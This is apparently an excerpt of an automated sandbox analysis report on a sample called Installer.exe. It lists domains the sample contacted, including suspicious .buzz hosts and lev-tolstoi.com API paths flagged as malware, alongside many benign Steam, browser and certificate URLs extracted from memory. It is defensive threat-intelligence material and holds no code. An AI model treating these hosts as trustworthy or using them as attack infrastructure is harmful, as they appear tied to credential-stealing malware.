                            rebuildeso.buzz
                            		unknown
                            		unknowntrue
                              		unknown
                              appliacnesot.buzz
                              		unknown
                              		unknowntrue
                                		unknown
                                hummskitnj.buzz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  mindhandru.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    screwamusresz.buzz
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          rebuildeso.buzzfalse
                                            		high
                                            appliacnesot.buzzfalse
                                              		high
                                              screwamusresz.buzzfalse
                                                		high
                                                cashfuzysao.buzzfalse
                                                  		high
                                                  inherineau.buzzfalse
                                                    		high
                                                    https://lev-tolstoi.com/apifalse
                                                      		high
                                                      hummskitnj.buzzfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtabInstaller.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcastsInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.microsoft.coInstaller.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/subscriber_agreement/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.valvesoftware.com/legal.htmInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lev-tolstoi.com/NVmAInstaller.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiInstaller.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lev-tolstoi.com/SInstaller.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englInstaller.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://steam.tv/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://microsoft.coc.Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.entrust.net/rpa03Installer.exefalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://store.steampowered.com/privacy_agreement/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/points/shop/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaInstaller.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://sketchfab.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.ecosia.org/newtab/Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lv.queniujq.cnInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brInstaller.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.youtube.com/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/privacy_agreement/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://lev-tolstoi.com/apix:ZInstaller.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://lev-tolstoi.com/espFInstaller.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://support.microsofInstaller.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/recaptcha/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://checkout.steampowered.com/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesInstaller.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.entrust.net/2048ca.crl0Installer.exefalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/;Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.entrust.net/rpa0Installer.exefalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/about/Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/my/wishlist/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://ocsp.entrust.net03Installer.exefalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://ocsp.entrust.net02Installer.exefalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://help.steampowered.com/en/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://steamcommunity.com/market/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/news/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://lev-tolstoi.com/pi.WInstaller.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://lev-tolstoi.com/$5Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://lev-tolstoi.com/apimInstaller.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://recaptcha.net/recaptcha/;Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/discussions/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/stats/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://medal.tvInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://broadcast.st.dl.eccdnx.comInstaller.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://x1.c.lencr.org/0Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://x1.i.lencr.org/0Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstaller.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstaller.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aInstaller.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
